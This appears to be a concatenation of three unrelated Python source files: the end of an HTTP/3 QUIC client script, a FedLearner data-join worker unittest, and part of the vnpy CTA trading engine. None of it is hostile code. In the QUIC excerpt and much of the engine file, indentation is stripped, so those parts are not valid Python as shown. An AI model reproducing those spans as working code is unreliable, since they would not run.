is_client=True, alpn_protocols=H0_ALPN if args.legacy_http else H3_ALPN
)
if args.ca_certs:
configuration.load_verify_locations(args.ca_certs)
if args.insecure:
configuration.verify_mode = ssl.CERT_NONE
if args.quic_log:
configuration.quic_logger = QuicLogger()
if args.secrets_log:
configuration.secrets_log_file = open(args.secrets_log, "a")
if args.session_ticket:
try:
with open(args.session_ticket, "rb") as fp:
configuration.session_ticket = pickle.load(fp)
except FileNotFoundError:
pass
if uvloop is not None:
uvloop.install()
loop = asyncio.get_event_loop()
try:
loop.run_until_complete(
run(
configuration=configuration,
url=args.url,
data=args.data,
parallel=args.parallel,
print_response=args.print_response,
)
)
finally:
if configuration.quic_logger is not None:
with open(args.quic_log, "w") as logger_fp:
json.dump(configuration.quic_logger.to_dict(), logger_fp, indent=4)
|
test_data_join_worker.py | # Copyright 2020 The FedLearner Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# coding: utf-8
import os
import threading
from os import listdir
from os.path import isfile, join
import time
import random
import logging
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
import unittest
import tensorflow.compat.v1 as tf
tf.enable_eager_execution()
import numpy as np
import tensorflow_io
from tensorflow.compat.v1 import gfile
from google.protobuf import text_format, empty_pb2, timestamp_pb2
import grpc
from fedlearner.common import common_pb2 as common_pb
from fedlearner.common import data_join_service_pb2 as dj_pb
from fedlearner.common import data_join_service_pb2_grpc as dj_grpc
from fedlearner.common.etcd_client import EtcdClient
from fedlearner.proxy.channel import make_insecure_channel, ChannelType
from fedlearner.data_join import (
data_block_manager, common,
data_join_master, data_join_worker,
raw_data_visitor, raw_data_publisher
)
from fedlearner.data_join.data_block_manager import DataBlockBuilder
from fedlearner.data_join.raw_data_iter_impl.tf_record_iter import TfExampleItem
class DataJoinWorker(unittest.TestCase):
    """End-to-end assembly test: a leader and a follower data-join master
    plus one worker pair join generated raw data over mock etcd, repeated
    for several rounds."""

    def setUp(self):
        """Create fresh leader/follower data sources, etcd clients and
        raw-data publishers; wipe any leftover etcd state and output dirs."""
        etcd_name = 'test_etcd'
        etcd_addrs = 'localhost:2379'
        etcd_base_dir_l = 'byefl_l'
        etcd_base_dir_f = 'byefl_f'
        data_source_name = 'test_data_source'
        etcd_l = EtcdClient(etcd_name, etcd_addrs, etcd_base_dir_l, True)
        etcd_f = EtcdClient(etcd_name, etcd_addrs, etcd_base_dir_f, True)
        # Start each role from a clean etcd namespace for this data source.
        etcd_l.delete_prefix(common.data_source_etcd_base_dir(data_source_name))
        etcd_f.delete_prefix(common.data_source_etcd_base_dir(data_source_name))

        # Leader-side data source definition.
        data_source_l = common_pb.DataSource()
        self.raw_data_pub_dir_l = './raw_data_pub_dir_l'
        data_source_l.raw_data_sub_dir = self.raw_data_pub_dir_l
        data_source_l.role = common_pb.FLRole.Leader
        data_source_l.state = common_pb.DataSourceState.Init
        data_source_l.output_base_dir = "./ds_output_l"
        self.raw_data_dir_l = "./raw_data_l"

        # Follower-side data source definition.
        data_source_f = common_pb.DataSource()
        self.raw_data_pub_dir_f = './raw_data_pub_dir_f'
        data_source_f.role = common_pb.FLRole.Follower
        data_source_f.raw_data_sub_dir = self.raw_data_pub_dir_f
        data_source_f.state = common_pb.DataSourceState.Init
        data_source_f.output_base_dir = "./ds_output_f"
        self.raw_data_dir_f = "./raw_data_f"

        # Shared metadata committed by both roles.
        data_source_meta = common_pb.DataSourceMeta()
        data_source_meta.name = data_source_name
        data_source_meta.partition_num = 2
        data_source_meta.start_time = 0
        data_source_meta.end_time = 100000000
        data_source_l.data_source_meta.MergeFrom(data_source_meta)
        common.commit_data_source(etcd_l, data_source_l)
        data_source_f.data_source_meta.MergeFrom(data_source_meta)
        common.commit_data_source(etcd_f, data_source_f)

        self.etcd_l = etcd_l
        self.etcd_f = etcd_f
        self.data_source_l = data_source_l
        self.data_source_f = data_source_f
        self.data_source_name = data_source_name
        self.etcd_name = etcd_name
        self.etcd_addrs = etcd_addrs
        self.etcd_base_dir_l = etcd_base_dir_l
        self.etcd_base_dir_f = etcd_base_dir_f
        self.raw_data_publisher_l = raw_data_publisher.RawDataPublisher(
            self.etcd_l, self.raw_data_pub_dir_l
        )
        self.raw_data_publisher_f = raw_data_publisher.RawDataPublisher(
            self.etcd_f, self.raw_data_pub_dir_f
        )

        # Remove stale output from earlier runs.
        if gfile.Exists(data_source_l.output_base_dir):
            gfile.DeleteRecursively(data_source_l.output_base_dir)
        if gfile.Exists(self.raw_data_dir_l):
            gfile.DeleteRecursively(self.raw_data_dir_l)
        if gfile.Exists(data_source_f.output_base_dir):
            gfile.DeleteRecursively(data_source_f.output_base_dir)
        if gfile.Exists(self.raw_data_dir_f):
            gfile.DeleteRecursively(self.raw_data_dir_f)

        self.worker_options = dj_pb.DataJoinWorkerOptions(
            use_mock_etcd=True,
            raw_data_options=dj_pb.RawDataOptions(
                raw_data_iter='TF_RECORD',
                read_ahead_size=1 << 20,
                read_batch_size=128
            ),
            example_id_dump_options=dj_pb.ExampleIdDumpOptions(
                example_id_dump_interval=1,
                example_id_dump_threshold=1024
            ),
            example_joiner_options=dj_pb.ExampleJoinerOptions(
                example_joiner='STREAM_JOINER',
                min_matching_window=64,
                max_matching_window=256,
                data_block_dump_interval=30,
                data_block_dump_threshold=1000
            ),
            batch_processor_options=dj_pb.BatchProcessorOptions(
                batch_size=512,
                max_flying_item=2048
            ),
            data_block_builder_options=dj_pb.WriterOptions(
                output_writer='TF_RECORD'
            )
        )

        # Number of example ids generated per round (4096).
        self.total_index = 1 << 12

    def generate_raw_data(self, start_index, etcd, rdp, data_source, raw_data_base_dir, partition_id,
                          block_size, shuffle_win_size, feat_key_fmt, feat_val_fmt):
        """Write raw-data blocks (TFRecord) for one partition, with ids
        randomly dropped and locally shuffled within *shuffle_win_size*,
        then publish the new file names through *rdp*."""
        dbm = data_block_manager.DataBlockManager(data_source, partition_id)
        raw_data_dir = os.path.join(raw_data_base_dir,
                                    common.partition_repr(partition_id))
        if not gfile.Exists(raw_data_dir):
            gfile.MakeDirs(raw_data_dir)
        useless_index = 0
        new_raw_data_fnames = []
        for block_index in range(start_index // block_size, (start_index + self.total_index) // block_size):
            builder = DataBlockBuilder(
                raw_data_base_dir,
                data_source.data_source_meta.name,
                partition_id, block_index,
                dj_pb.WriterOptions(output_writer='TF_RECORD'), None
            )
            cands = list(range(block_index * block_size, (block_index + 1) * block_size))
            start_index = cands[0]
            for i in range(len(cands)):
                # Randomly drop about half of the ids...
                if random.randint(1, 4) > 2:
                    continue
                # ...and swap pairs within the shuffle window to produce
                # mildly out-of-order input.
                a = random.randint(i - shuffle_win_size, i + shuffle_win_size)
                b = random.randint(i - shuffle_win_size, i + shuffle_win_size)
                if a < 0:
                    a = 0
                if a >= len(cands):
                    a = len(cands) - 1
                if b < 0:
                    b = 0
                if b >= len(cands):
                    b = len(cands) - 1
                if (abs(cands[a]-i-start_index) <= shuffle_win_size and
                        abs(cands[b]-i-start_index) <= shuffle_win_size):
                    cands[a], cands[b] = cands[b], cands[a]
            for example_idx in cands:
                feat = {}
                example_id = '{}'.format(example_idx).encode()
                feat['example_id'] = tf.train.Feature(
                    bytes_list=tf.train.BytesList(value=[example_id]))
                event_time = 150000000 + example_idx
                feat['event_time'] = tf.train.Feature(
                    int64_list=tf.train.Int64List(value=[event_time]))
                feat[feat_key_fmt.format(example_idx)] = tf.train.Feature(
                    bytes_list=tf.train.BytesList(
                        value=[feat_val_fmt.format(example_idx).encode()]))
                example = tf.train.Example(features=tf.train.Features(feature=feat))
                builder.append_item(TfExampleItem(example.SerializeToString()),
                                    useless_index, useless_index)
                useless_index += 1
            meta = builder.finish_data_block()
            fname = common.encode_data_block_fname(
                data_source.data_source_meta.name,
                meta
            )
            new_raw_data_fnames.append(os.path.join(raw_data_dir, fname))
        # Drop the meta files: only the data block files are published.
        fpaths = [os.path.join(raw_data_dir, f)
                  for f in gfile.ListDirectory(raw_data_dir)
                  if not gfile.IsDirectory(os.path.join(raw_data_dir, f))]
        for fpath in fpaths:
            if fpath.endswith(common.DataBlockMetaSuffix):
                gfile.Remove(fpath)
        rdp.publish_raw_data(partition_id, new_raw_data_fnames)

    def test_all_assembly(self):
        # Three successive rounds over disjoint id ranges.
        for i in range(3):
            logging.info('Testing round %d', i + 1)
            self._inner_test_round(i*self.total_index)

    def _inner_test_round(self, start_index):
        """Run one full join round: generate data for every partition,
        start both masters and one worker pair, and wait until the data
        source reaches the Ready state."""
        for i in range(self.data_source_l.data_source_meta.partition_num):
            self.generate_raw_data(
                start_index, self.etcd_l, self.raw_data_publisher_l,
                self.data_source_l, self.raw_data_dir_l, i, 2048, 64,
                'leader_key_partition_{}'.format(i) + ':{}',
                'leader_value_partition_{}'.format(i) + ':{}'
            )
            self.generate_raw_data(
                start_index, self.etcd_f, self.raw_data_publisher_f,
                self.data_source_f, self.raw_data_dir_f, i, 4096, 128,
                'follower_key_partition_{}'.format(i) + ':{}',
                'follower_value_partition_{}'.format(i) + ':{}'
            )
        master_addr_l = 'localhost:4061'
        master_addr_f = 'localhost:4062'
        master_options = dj_pb.DataJoinMasterOptions(use_mock_etcd=True,
                                                     batch_mode=True)
        master_l = data_join_master.DataJoinMasterService(
            int(master_addr_l.split(':')[1]), master_addr_f,
            self.data_source_name, self.etcd_name, self.etcd_base_dir_l,
            self.etcd_addrs, master_options,
        )
        master_l.start()
        master_f = data_join_master.DataJoinMasterService(
            int(master_addr_f.split(':')[1]), master_addr_l,
            self.data_source_name, self.etcd_name, self.etcd_base_dir_f,
            self.etcd_addrs, master_options
        )
        master_f.start()
        channel_l = make_insecure_channel(master_addr_l, ChannelType.INTERNAL)
        master_client_l = dj_grpc.DataJoinMasterServiceStub(channel_l)
        channel_f = make_insecure_channel(master_addr_f, ChannelType.INTERNAL)
        master_client_f = dj_grpc.DataJoinMasterServiceStub(channel_f)
        # Poll until both masters have negotiated into Processing state.
        # Exceptions (e.g. servers not yet serving) are retried, not fatal.
        while True:
            try:
                req_l = dj_pb.DataSourceRequest(
                    data_source_meta=self.data_source_l.data_source_meta
                )
                req_f = dj_pb.DataSourceRequest(
                    data_source_meta=self.data_source_f.data_source_meta
                )
                dss_l = master_client_l.GetDataSourceStatus(req_l)
                dss_f = master_client_f.GetDataSourceStatus(req_f)
                self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
                self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
                if dss_l.state == common_pb.DataSourceState.Processing and \
                        dss_f.state == common_pb.DataSourceState.Processing:
                    break
            except Exception as e:
                pass
            time.sleep(2)
        worker_addr_l = 'localhost:4161'
        worker_addr_f = 'localhost:4162'
        # One worker per role, both handling rank 0.
        worker_l = data_join_worker.DataJoinWorkerService(
            int(worker_addr_l.split(':')[1]),
            worker_addr_f, master_addr_l, 0,
            self.etcd_name, self.etcd_base_dir_l,
            self.etcd_addrs, self.worker_options
        )
        worker_f = data_join_worker.DataJoinWorkerService(
            int(worker_addr_f.split(':')[1]),
            worker_addr_l, master_addr_f, 0,
            self.etcd_name, self.etcd_base_dir_f,
            self.etcd_addrs, self.worker_options
        )
        th_l = threading.Thread(target=worker_l.run, name='worker_l')
        th_f = threading.Thread(target=worker_f.run, name='worker_f')
        th_l.start()
        th_f.start()
        # Poll until the batch-mode join finishes (both sides Ready).
        while True:
            try:
                req_l = dj_pb.DataSourceRequest(
                    data_source_meta=self.data_source_l.data_source_meta
                )
                req_f = dj_pb.DataSourceRequest(
                    data_source_meta=self.data_source_f.data_source_meta
                )
                dss_l = master_client_l.GetDataSourceStatus(req_l)
                dss_f = master_client_f.GetDataSourceStatus(req_f)
                self.assertEqual(dss_l.role, common_pb.FLRole.Leader)
                self.assertEqual(dss_f.role, common_pb.FLRole.Follower)
                if dss_l.state == common_pb.DataSourceState.Ready and \
                        dss_f.state == common_pb.DataSourceState.Ready:
                    break
            except Exception as e:
                pass
            time.sleep(2)
        th_l.join()
        th_f.join()
        master_l.stop()
        master_f.stop()

    def tearDown(self):
        """Delete all generated output/raw-data directories and etcd state."""
        if gfile.Exists(self.data_source_l.output_base_dir):
            gfile.DeleteRecursively(self.data_source_l.output_base_dir)
        if gfile.Exists(self.raw_data_dir_l):
            gfile.DeleteRecursively(self.raw_data_dir_l)
        if gfile.Exists(self.data_source_f.output_base_dir):
            gfile.DeleteRecursively(self.data_source_f.output_base_dir)
        if gfile.Exists(self.raw_data_dir_f):
            gfile.DeleteRecursively(self.raw_data_dir_f)
        self.etcd_f.delete_prefix(common.data_source_etcd_base_dir(self.etcd_base_dir_f))
        self.etcd_l.delete_prefix(common.data_source_etcd_base_dir(self.etcd_base_dir_l))
if __name__ == '__main__':
    # Run the test case above under the standard unittest runner.
    unittest.main()
|
engine.py | """"""
import importlib
import os
import traceback
from collections import defaultdict
from pathlib import Path
from typing import Any, Callable
from datetime import datetime, timedelta
from threading import Thread
from queue import Queue
from copy import copy
from vnpy.event import Event, EventEngine
from vnpy.trader.engine import BaseEngine, MainEngine
from vnpy.trader.object import (
OrderRequest,
SubscribeRequest,
HistoryRequest,
LogData,
TickData,
BarData,
ContractData
)
from vnpy.trader.event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION
)
from vnpy.trader.constant import (
Direction,
OrderType,
Interval,
Exchange,
Offset,
Status
)
from vnpy.trader.utility import load_json, save_json, extract_vt_symbol, round_to
from vnpy.trader.database import database_manager
from vnpy.trader.rqdata import rqdata_client
from .base import (
APP_NAME,
EVENT_CTA_LOG,
EVENT_CTA_STRATEGY,
EVENT_CTA_STOPORDER,
EngineType,
StopOrder,
StopOrderStatus,
STOPORDER_PREFIX
)
from .template import CtaTemplate
from .converter import OffsetConverter
# Map broker order status onto the local stop-order lifecycle:
# not-yet-filled states stay WAITING, any fill means the stop TRIGGERED,
# and terminal cancel/reject states become CANCELLED.
STOP_STATUS_MAP = {
    Status.SUBMITTING: StopOrderStatus.WAITING,
    Status.NOTTRADED: StopOrderStatus.WAITING,
    Status.PARTTRADED: StopOrderStatus.TRIGGERED,
    Status.ALLTRADED: StopOrderStatus.TRIGGERED,
    Status.CANCELLED: StopOrderStatus.CANCELLED,
    Status.REJECTED: StopOrderStatus.CANCELLED
}
class CtaEngine(BaseEngine):
""""""
engine_type = EngineType.LIVE # live trading engine
setting_filename = "cta_strategy_setting.json"
data_filename = "cta_strategy_data.json"
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
    """Create the CTA engine and its bookkeeping maps; no I/O happens
    here (see init_engine for the actual bootstrap)."""
    super(CtaEngine, self).__init__(
        main_engine, event_engine, APP_NAME)

    self.strategy_setting = {}  # strategy_name: dict
    self.strategy_data = {}  # strategy_name: dict

    self.classes = {}  # class_name: strategy_class
    self.strategies = {}  # strategy_name: strategy

    self.symbol_strategy_map = defaultdict(
        list)  # vt_symbol: strategy list
    self.orderid_strategy_map = {}  # vt_orderid: strategy
    self.strategy_orderid_map = defaultdict(
        set)  # strategy_name: orderid list

    self.stop_order_count = 0  # for generating stop_orderid
    self.stop_orders = {}  # stop_orderid: stop_order

    # Strategy initialization is serialized through this queue/thread.
    self.init_thread = None
    self.init_queue = Queue()

    self.rq_client = None
    self.rq_symbols = set()

    self.vt_tradeids = set()  # for filtering duplicate trade

    self.offset_converter = OffsetConverter(self.main_engine)
    def init_engine(self):
        """Initialize the engine: data client, strategy classes, persisted
        settings/data, then event subscriptions (order matters)."""
        self.init_rqdata()
        self.load_strategy_class()
        self.load_strategy_setting()
        self.load_strategy_data()
        self.register_event()
        self.write_log("CTA策略引擎初始化成功")
    def close(self):
        """Shut down the engine by stopping every running strategy."""
        self.stop_all_strategies()
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
    def init_rqdata(self):
        """
        Init RQData client.

        Only logs on success; a failed init is silent here and surfaces
        later as empty query results.
        """
        result = rqdata_client.init()
        if result:
            self.write_log("RQData数据接口初始化成功")
def query_bar_from_rq(
self, symbol: str, exchange: Exchange, interval: Interval, start: datetime, end: datetime
):
"""
Query bar data from RQData.
"""
req = HistoryRequest(
symbol=symbol,
exchange=exchange,
interval=interval,
start=start,
end=end
)
data = rqdata_client.query_history(req)
return data
    def process_tick_event(self, event: Event):
        """Check local stop orders against the tick, then forward it to
        every initialized strategy subscribed to the symbol."""
        tick = event.data

        strategies = self.symbol_strategy_map[tick.vt_symbol]
        if not strategies:
            return

        self.check_stop_order(tick)

        for strategy in strategies:
            if strategy.inited:
                self.call_strategy_func(strategy, strategy.on_tick, tick)
    def process_order_event(self, event: Event):
        """Update internal caches for an order push and forward it to the
        owning strategy (including a synthesized StopOrder view for
        server-side stop orders)."""
        order = event.data

        self.offset_converter.update_order(order)

        strategy = self.orderid_strategy_map.get(order.vt_orderid, None)
        if not strategy:
            return

        # Remove vt_orderid if order is no longer active.
        vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
        if order.vt_orderid in vt_orderids and not order.is_active():
            vt_orderids.remove(order.vt_orderid)

        # For server stop order, call strategy on_stop_order function
        # with a StopOrder mirror whose status is mapped from the broker
        # status via STOP_STATUS_MAP.
        if order.type == OrderType.STOP:
            so = StopOrder(
                vt_symbol=order.vt_symbol,
                direction=order.direction,
                offset=order.offset,
                price=order.price,
                volume=order.volume,
                stop_orderid=order.vt_orderid,
                strategy_name=strategy.strategy_name,
                status=STOP_STATUS_MAP[order.status],
                vt_orderids=[order.vt_orderid],
            )
            self.call_strategy_func(strategy, strategy.on_stop_order, so)

        # Call strategy on_order function
        self.call_strategy_func(strategy, strategy.on_order, order)
    def process_trade_event(self, event: Event):
        """Apply a trade push to the owning strategy's position, notify it,
        and persist the strategy's variables."""
        trade = event.data

        # Filter duplicate trade push
        if trade.vt_tradeid in self.vt_tradeids:
            return
        self.vt_tradeids.add(trade.vt_tradeid)

        self.offset_converter.update_trade(trade)

        strategy = self.orderid_strategy_map.get(trade.vt_orderid, None)
        if not strategy:
            return

        # Update strategy pos before calling on_trade method
        if trade.direction == Direction.LONG:
            strategy.pos += trade.volume
        else:
            strategy.pos -= trade.volume

        self.call_strategy_func(strategy, strategy.on_trade, trade)

        # Sync strategy variables to data file
        self.sync_strategy_data(strategy)

        # Update GUI
        self.put_strategy_event(strategy)
    def process_position_event(self, event: Event):
        """Feed position pushes into the offset converter's holding cache."""
        position = event.data

        self.offset_converter.update_position(position)
    def check_stop_order(self, tick: TickData):
        """Scan local stop orders for *tick*'s symbol and convert any that
        the last price has crossed into real limit orders."""
        # Iterate over a snapshot: triggering pops entries from the dict.
        for stop_order in list(self.stop_orders.values()):
            if stop_order.vt_symbol != tick.vt_symbol:
                continue

            long_triggered = (
                stop_order.direction == Direction.LONG and tick.last_price >= stop_order.price
            )
            short_triggered = (
                stop_order.direction == Direction.SHORT and tick.last_price <= stop_order.price
            )

            if long_triggered or short_triggered:
                strategy = self.strategies[stop_order.strategy_name]

                # To get executed immediately after stop order is
                # triggered, use limit-up/limit-down price if available,
                # otherwise use ask_price_5 or bid_price_5
                if stop_order.direction == Direction.LONG:
                    if tick.limit_up:
                        price = tick.limit_up
                    else:
                        price = tick.ask_price_5
                else:
                    if tick.limit_down:
                        price = tick.limit_down
                    else:
                        price = tick.bid_price_5

                contract = self.main_engine.get_contract(stop_order.vt_symbol)

                vt_orderids = self.send_limit_order(
                    strategy,
                    contract,
                    stop_order.direction,
                    stop_order.offset,
                    price,
                    stop_order.volume,
                    stop_order.lock
                )

                # Update stop order status if placed successfully
                if vt_orderids:
                    # Remove from relation map.
                    self.stop_orders.pop(stop_order.stop_orderid)

                    strategy_vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
                    if stop_order.stop_orderid in strategy_vt_orderids:
                        strategy_vt_orderids.remove(stop_order.stop_orderid)

                    # Mark the stop order as triggered and notify the strategy.
                    stop_order.status = StopOrderStatus.TRIGGERED
                    stop_order.vt_orderids = vt_orderids

                    self.call_strategy_func(
                        strategy, strategy.on_stop_order, stop_order
                    )
                    self.put_stop_order_event(stop_order)
    def send_server_order(
        self,
        strategy: CtaTemplate,
        contract: ContractData,
        direction: Direction,
        offset: Offset,
        price: float,
        volume: float,
        type: OrderType,  # NOTE: shadows builtin `type`; kept for interface compatibility
        lock: bool
    ):
        """
        Send a new order to server.

        The request may be split into several actual orders by the offset
        converter (e.g. lock mode); returns the list of vt_orderids sent.
        """
        # Create request and send order.
        original_req = OrderRequest(
            symbol=contract.symbol,
            exchange=contract.exchange,
            direction=direction,
            offset=offset,
            type=type,
            price=price,
            volume=volume,
        )

        # Convert with offset converter
        req_list = self.offset_converter.convert_order_request(original_req, lock)

        # Send Orders
        vt_orderids = []

        for req in req_list:
            vt_orderid = self.main_engine.send_order(
                req, contract.gateway_name)
            vt_orderids.append(vt_orderid)

            self.offset_converter.update_order_request(req, vt_orderid)

            # Save relationship between orderid and strategy.
            self.orderid_strategy_map[vt_orderid] = strategy
            self.strategy_orderid_map[strategy.strategy_name].add(vt_orderid)

        return vt_orderids
def send_limit_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a limit order to server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.LIMIT,
lock
)
def send_server_stop_order(
self,
strategy: CtaTemplate,
contract: ContractData,
direction: Direction,
offset: Offset,
price: float,
volume: float,
lock: bool
):
"""
Send a stop order to server.
Should only be used if stop order supported
on the trading server.
"""
return self.send_server_order(
strategy,
contract,
direction,
offset,
price,
volume,
OrderType.STOP,
lock
)
    def send_local_stop_order(
        self,
        strategy: CtaTemplate,
        direction: Direction,
        offset: Offset,
        price: float,
        volume: float,
        lock: bool
    ):
        """
        Create a new local stop order.

        The order is only simulated inside this engine (triggered by
        check_stop_order on ticks); returns the generated stop_orderid.
        """
        self.stop_order_count += 1
        stop_orderid = f"{STOPORDER_PREFIX}.{self.stop_order_count}"

        stop_order = StopOrder(
            vt_symbol=strategy.vt_symbol,
            direction=direction,
            offset=offset,
            price=price,
            volume=volume,
            stop_orderid=stop_orderid,
            strategy_name=strategy.strategy_name,
            lock=lock
        )

        self.stop_orders[stop_orderid] = stop_order

        vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
        vt_orderids.add(stop_orderid)

        self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
        self.put_stop_order_event(stop_order)

        return stop_orderid
    def cancel_server_order(self, strategy: CtaTemplate, vt_orderid: str):
        """
        Cancel existing order by vt_orderid.

        The strategy is only used for log attribution; the cancel request
        is built from the cached order object.
        """
        order = self.main_engine.get_order(vt_orderid)
        if not order:
            self.write_log(f"撤单失败,找不到委托{vt_orderid}", strategy)
            return

        req = order.create_cancel_request()
        self.main_engine.cancel_order(req, order.gateway_name)
    def cancel_local_stop_order(self, strategy: CtaTemplate, stop_orderid: str):
        """
        Cancel a local stop order.

        Silently returns if the id is unknown; otherwise removes it from
        all maps, marks it CANCELLED and notifies the owning strategy.
        """
        stop_order = self.stop_orders.get(stop_orderid, None)
        if not stop_order:
            return
        # Re-resolve the owner from the order itself (may differ from the
        # caller-supplied strategy argument).
        strategy = self.strategies[stop_order.strategy_name]

        # Remove from relation map.
        self.stop_orders.pop(stop_orderid)

        vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
        if stop_orderid in vt_orderids:
            vt_orderids.remove(stop_orderid)

        # Change stop order status to cancelled and update to strategy.
        stop_order.status = StopOrderStatus.CANCELLED
        self.call_strategy_func(strategy, strategy.on_stop_order, stop_order)
        self.put_stop_order_event(stop_order)
    def send_order(
        self,
        strategy: CtaTemplate,
        direction: Direction,
        offset: Offset,
        price: float,
        volume: float,
        stop: bool,
        lock: bool
    ):
        """
        Route an order request from a strategy.

        Returns "" when the contract is unknown; otherwise delegates to a
        server stop order, a local stop order, or a plain limit order.
        (Note the delegates return either a list of vt_orderids or a
        single stop_orderid string.)
        """
        contract = self.main_engine.get_contract(strategy.vt_symbol)
        if not contract:
            self.write_log(f"委托失败,找不到合约:{strategy.vt_symbol}", strategy)
            return ""

        # Round order price and volume to nearest incremental value
        price = round_to(price, contract.pricetick)
        volume = round_to(volume, contract.min_volume)

        if stop:
            if contract.stop_supported:
                return self.send_server_stop_order(strategy, contract, direction, offset, price, volume, lock)
            else:
                return self.send_local_stop_order(strategy, direction, offset, price, volume, lock)
        else:
            return self.send_limit_order(strategy, contract, direction, offset, price, volume, lock)
def cancel_order(self, strategy: CtaTemplate, vt_orderid: str):
"""
"""
if vt_orderid.startswith(STOPORDER_PREFIX):
self.cancel_local_stop_order(strategy, vt_orderid)
else:
self.cancel_server_order(strategy, vt_orderid)
def cancel_all(self, strategy: CtaTemplate):
"""
Cancel all active orders of a strategy.
"""
vt_orderids = self.strategy_orderid_map[strategy.strategy_name]
if not vt_orderids:
return
for vt_orderid in copy(vt_orderids):
self.cancel_order(strategy, vt_orderid)
    def get_engine_type(self):
        """Return this engine's EngineType (LIVE for this class)."""
        return self.engine_type
    def load_bar(
        self,
        vt_symbol: str,
        days: int,
        interval: Interval,
        callback: Callable[[BarData], None]
    ):
        """Load the last *days* of bar history and feed each bar to
        *callback* (typically the strategy's on_bar)."""
        symbol, exchange = extract_vt_symbol(vt_symbol)
        end = datetime.now()
        start = end - timedelta(days)

        # Query bars from RQData by default, if not found, load from database.
        bars = self.query_bar_from_rq(symbol, exchange, interval, start, end)
        if not bars:
            bars = database_manager.load_bar_data(
                symbol=symbol,
                exchange=exchange,
                interval=interval,
                start=start,
                end=end,
            )

        for bar in bars:
            callback(bar)
    def load_tick(
        self,
        vt_symbol: str,
        days: int,
        callback: Callable[[TickData], None]
    ):
        """Load the last *days* of tick history from the database and feed
        each tick to *callback* (typically the strategy's on_tick)."""
        symbol, exchange = extract_vt_symbol(vt_symbol)
        end = datetime.now()
        start = end - timedelta(days)

        ticks = database_manager.load_tick_data(
            symbol=symbol,
            exchange=exchange,
            start=start,
            end=end,
        )

        for tick in ticks:
            callback(tick)
def call_strategy_func(
self, strategy: CtaTemplate, func: Callable, params: Any = None
):
"""
Call function of a strategy and catch any exception raised.
"""
try:
if params:
func(params)
else:
func()
except Exception:
strategy.trading = False
strategy.inited = False
msg = f"触发异常已停止\n{traceback.format_exc()}"
self.write_log(msg, strategy)
    def add_strategy(
        self, class_name: str, strategy_name: str, vt_symbol: str, setting: dict
    ):
        """
        Add a new strategy.

        Rejects duplicate names and unknown classes (logged, no exception);
        on success updates the setting file and pushes a GUI event.
        """
        if strategy_name in self.strategies:
            self.write_log(f"创建策略失败,存在重名{strategy_name}")
            return

        strategy_class = self.classes.get(class_name, None)
        if not strategy_class:
            self.write_log(f"创建策略失败,找不到策略类{class_name}")
            return

        strategy = strategy_class(self, strategy_name, vt_symbol, setting)
        self.strategies[strategy_name] = strategy

        # Add vt_symbol to strategy map.
        strategies = self.symbol_strategy_map[vt_symbol]
        strategies.append(strategy)

        # Update to setting file.
        self.update_strategy_setting(strategy_name, setting)

        self.put_strategy_event(strategy)
    def init_strategy(self, strategy_name: str):
        """
        Init a strategy.

        The request is queued; a single worker thread drains the queue so
        initializations never run concurrently.
        """
        self.init_queue.put(strategy_name)

        if not self.init_thread:
            self.init_thread = Thread(target=self._init_strategy)
            self.init_thread.start()
def _init_strategy(self):
"""
Init strategies in queue.
"""
while not self.init_queue.empty():
strategy_name = self.init_queue.get()
strategy = self.strategies[strategy_name]
if strategy.inited:
self.write_log(f"{strategy_name}已经完成初始化,禁止重复操作")
continue
self.write_log(f"{strategy_name}开始执行初始化")
# Call on_init function of strategy
self.call_strategy_func(strategy, strategy.on_init)
# Restore strategy data(variables)
data = self.strategy_data.get(strategy_name, None)
if data:
for name in strategy.variables:
value = data.get(name, None)
if value:
setattr(strategy, name, value)
# Subscribe market data
contract = self.main_engine.get_contract(strategy.vt_symbol)
if contract:
req = SubscribeRequest(
symbol=contract.symbol, exchange=contract.exchange)
self.main_engine.subscribe(req, contract.gateway_name)
else:
self.write_log(f"行情订阅失败,找不到合约{strategy.vt_symbol}", strategy)
# Put event to update init completed status.
strategy.inited = True
self.put_strategy_event(strategy)
self.write_log(f"{strategy_name}初始化完成")
self.init_thread = None
    def start_strategy(self, strategy_name: str):
        """
        Start a strategy.

        Requires a prior successful init; starting an already running
        strategy is a logged no-op.
        """
        strategy = self.strategies[strategy_name]
        if not strategy.inited:
            self.write_log(f"策略{strategy.strategy_name}启动失败,请先初始化")
            return

        if strategy.trading:
            self.write_log(f"{strategy_name}已经启动,请勿重复操作")
            return

        self.call_strategy_func(strategy, strategy.on_start)
        strategy.trading = True

        self.put_strategy_event(strategy)
    def stop_strategy(self, strategy_name: str):
        """
        Stop a strategy: on_stop callback, disable trading, cancel all of
        its active orders, persist variables and refresh the GUI.
        """
        strategy = self.strategies[strategy_name]
        if not strategy.trading:
            return

        # Call on_stop function of the strategy
        self.call_strategy_func(strategy, strategy.on_stop)

        # Change trading status of strategy to False
        strategy.trading = False

        # Cancel all orders of the strategy
        self.cancel_all(strategy)

        # Sync strategy variables to data file
        self.sync_strategy_data(strategy)

        # Update GUI
        self.put_strategy_event(strategy)
    def edit_strategy(self, strategy_name: str, setting: dict):
        """
        Edit parameters of a strategy, persist them and refresh the GUI.
        """
        strategy = self.strategies[strategy_name]
